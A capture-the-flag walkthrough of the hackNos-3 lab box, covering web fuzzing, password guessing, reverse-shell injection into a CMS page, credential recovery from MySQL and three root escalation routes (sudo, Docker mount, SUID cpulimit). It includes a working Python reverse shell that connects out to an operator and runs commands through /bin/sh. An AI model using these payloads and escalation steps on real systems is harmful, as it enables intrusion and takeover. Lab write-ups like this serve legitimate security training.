Last updated: 15 Apr 24 09:30:56 (UTC)

Write-Up HackNos-3

hackNos 3

By Lawcky 03/01/2024

Introduction

Flags: 2 (the first for user and the second for root)

Learning: Web Application | Enumeration | Privilege Escalation

Difficulty : Medium

Additional info:

Name: hackNos: Os-hackNos-3
Release date: 14 Dec 2019
Author: Rahul Gehlaut
Series: hackNos

|NOTE| we do not copy the full scans here as they would be far too voluminous; click here to see them



Write-UP

Fuzzing

ffuf -w /usr/share/SecLists/Discovery/Web-Content/directory-list-2.3-big.txt:FUZZ -u http://192.168.1.65/FUZZ

we also tried the same list with the extensions “.txt” and “.html”, and with the “.FUZZ” and “.FUZZ.txt” patterns in the URL

found :
/devil
/websec

Getting first access

reading through the website on /websec/ we learn the contact address
contact@hacknos.com
and with cewl we build a wordlist from the site's own content (depth 2):

cewl -d 2 http://192.168.1.65 -w websec.dic

with this wordlist we found the account:
contact@hacknos.com:Securityx


Looking for RCE

7f59cfd52dda41ba51074740b384bfe3.png
the CMS version has a known RCE ===> exploit-db; with the credentials above we can reach its file manager

we go to the file manager and inject PHP code into the index.php page: every time the default page is opened a reverse shell connection is sent back to our listener (so start the listener before loading the page, and keep in mind that any other visitor will trigger it too).

93b541b1f5a12f3fecf24e1a0e8a909e.png
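As an added example (not the author's PHP payload and not code from the box), here is the connect-back mechanism the injected page relies on, written in Python so both sides can be run locally: the payload side connects to the operator, executes each line it receives through /bin/sh and sends the output back; the operator side listens, sends one command and collects the result. The line-per-command framing and the END_MARK delimiter are assumptions of this example.

```python
import socket
import subprocess
import threading

# Framing marker so the operator side knows when one command's output ends.
# The marker and the "one command per line" protocol are an assumption of
# this example, not something from the write-up.
END_MARK = "__END_OF_OUTPUT__"


def run_command(cmd: str) -> str:
    """Run one command through /bin/sh and return stdout + stderr."""
    proc = subprocess.run(cmd, shell=True, capture_output=True, text=True)
    return proc.stdout + proc.stderr


def connect_back(host: str, port: int) -> int:
    """Payload side: connect to the operator, execute each line received
    until 'exit', send the output back. Returns the number of commands run."""
    executed = 0
    with socket.create_connection((host, port)) as sock, sock.makefile("rw") as f:
        for line in f:
            cmd = line.strip()
            if cmd == "exit":
                break
            f.write(run_command(cmd) + "\n" + END_MARK + "\n")
            f.flush()
            executed += 1
    return executed


def demo_roundtrip(command: str = "id") -> str:
    """Operator side: listen on a random loopback port, let the payload
    connect back, send one command and return its output. This is a
    constructed, self-contained round trip for demonstration."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    output = []

    def operator():
        conn, _ = srv.accept()
        with conn, conn.makefile("rw") as f:
            f.write(command + "\n")
            f.flush()
            chunks = []
            for line in f:
                if line.rstrip("\n") == END_MARK:
                    break
                chunks.append(line)
            output.append("".join(chunks))
            f.write("exit\n")
            f.flush()

    t = threading.Thread(target=operator, daemon=True)
    t.start()
    connect_back("127.0.0.1", port)  # on a real engagement this runs on the target
    t.join()
    srv.close()
    return output[0].strip()


if __name__ == "__main__":
    print(demo_roundtrip("id"))
```

The real payload is the `connect_back` half; the `demo_roundtrip` helper only exists so the exchange can be exercised on one machine. Because the injected index.php fires on every page load, a practitioner would rather put the trigger in a separate, unlinked file than in the default page.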


Privilege Escalation

0c49ff1b77641909e7b777b0f8efbe6b.png
we got the first (user) flag

Linux Enumeration

we run linpeas

it finds an unknown service listening on a high port
fa016fba3e48f46f1deaa26da1d64253.png

the blackdevil user is a member of many groups that can easily be abused for privilege escalation (docker in particular)
fcd4783a5bd270cb5bf6f31b52008fd6.png

5cd9b55938e1eb828b4810b6fff4dd14.png

linpeas also lists the SUID binaries; to verify it ourselves we can run

find / -perm -4000 2>/dev/null

3e4158ebe60b14d5a5e0ba0b74458a92.png

===> GTFOBins lists cpulimit as abusable when it is SUID

but we need the blackdevil user's password to do so.
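As an added example that is not part of the original write-up, the two checks above (SUID binaries cross-referenced with GTFOBins, and the groups blackdevil belongs to) can be scripted for quick triage. The GTFOBINS_SUID subset, the ROOT_GROUPS set and the /etc/group excerpt are assumptions constructed for this example; `demo()` builds a throwaway directory with a fake SUID cpulimit so it runs offline.

```python
import os
import shutil
import stat
import tempfile

# Hand-picked subset of binaries that GTFOBins documents as abusable when
# they carry the SUID bit (cpulimit is the one used in this write-up).
# The set is an assumption of the example, not the full GTFOBins catalogue.
GTFOBINS_SUID = {"awk", "bash", "cpulimit", "env", "find", "less",
                 "perl", "php", "python", "python3", "vim"}

# Groups whose membership usually means a direct path to root.
ROOT_GROUPS = {"docker", "sudo", "lxd", "disk", "shadow", "adm"}


def find_suid(root: str = "/") -> list:
    """Equivalent of `find / -perm -4000`: regular files with the SUID bit."""
    hits = []
    for dirpath, _dirs, files in os.walk(root, onerror=lambda e: None):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                hits.append(path)
    return sorted(hits)


def gtfobins_candidates(paths: list) -> list:
    """Keep only the SUID binaries whose name is in the GTFOBins subset."""
    return [p for p in paths if os.path.basename(p) in GTFOBINS_SUID]


def root_groups_for(group_file: str, user: str) -> list:
    """Parse /etc/group text and return the user's groups from ROOT_GROUPS."""
    found = []
    for line in group_file.splitlines():
        fields = line.split(":")
        if len(fields) < 4:
            continue
        name, members = fields[0], [m for m in fields[3].split(",") if m]
        if user in members and name in ROOT_GROUPS:
            found.append(name)
    return sorted(found)


# Constructed /etc/group excerpt modelled on the write-up (blackdevil in
# docker and sudo); sample data, not the real file from the box.
SAMPLE_GROUP_FILE = """root:x:0:
adm:x:4:syslog
sudo:x:27:blackdevil
users:x:100:blackdevil
docker:x:999:blackdevil
lxd:x:108:
"""


def demo() -> dict:
    """Create one SUID 'cpulimit' and one plain file in a temp directory,
    run the triage on it and return the findings by basename."""
    tmp = tempfile.mkdtemp(prefix="suid-triage-")
    try:
        for name, mode in (("cpulimit", 0o4755), ("normal", 0o755)):
            path = os.path.join(tmp, name)
            with open(path, "w") as fh:
                fh.write("#!/bin/sh\n")
            os.chmod(path, mode)
        suid = find_suid(tmp)
        return {
            "suid": [os.path.basename(p) for p in suid],
            "candidates": [os.path.basename(p) for p in gtfobins_candidates(suid)],
            "groups": root_groups_for(SAMPLE_GROUP_FILE, "blackdevil"),
        }
    finally:
        shutil.rmtree(tmp, ignore_errors=True)


if __name__ == "__main__":
    for path in gtfobins_candidates(find_suid("/")):
        print("SUID candidate:", path)
    with open("/etc/group") as fh:
        print("root groups:", root_groups_for(fh.read(), os.environ.get("USER", "")))
```

Run as a script on the target it walks the real filesystem and /etc/group; the `demo()` function is only there so the logic can be checked without a vulnerable box.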

port 35563 is a MySQL server; after looking around in it we find this:

7015674da252dae0be960ee940454a51.png


Mysql

SELECT * FROM ost_staff;

003aac0e8b6a4e838beeb3a644075ef7.png

ef9c615efcea903c17d6c21f85b97953.png


none of the credentials found in the database worked
the answer:
cat /var/local/database

4ab94b02b211db9b99782fb68b4ce88a.png

run its content through a ‘fakesheet decoder’ (it did not even work for me)

which then gives:

blackdevil:Security@x@


Privilege Escalation

there are at least 3 ways to get root, since the default privilege escalation on this box is very easy

First Way

sudo su

caaa36b150fc716f309d803067e84bad.png

Second Way

using docker (blackdevil is in the docker group, so we can start a container with the host's /root mounted inside it and read the root flag from /mnt)

docker run -v /root/:/mnt -it alpine

3b4a58bba92982a81cd7443209b1affd.png

Third Way

using SUID

the cpulimit binary has the SUID bit set, which GTFOBins lists as abusable for privesc

sudo install -m =xs $(which cpulimit) .

(the install line is the GTFOBins setup step that creates a SUID copy; on this box cpulimit is already SUID, so it can be skipped, and it would need sudo anyway)

./cpulimit -l 100 -f -- /bin/sh -p

(-p keeps the effective uid, so the spawned sh stays root)

b0e488689a7c761784f8a3a3a9208ac2.png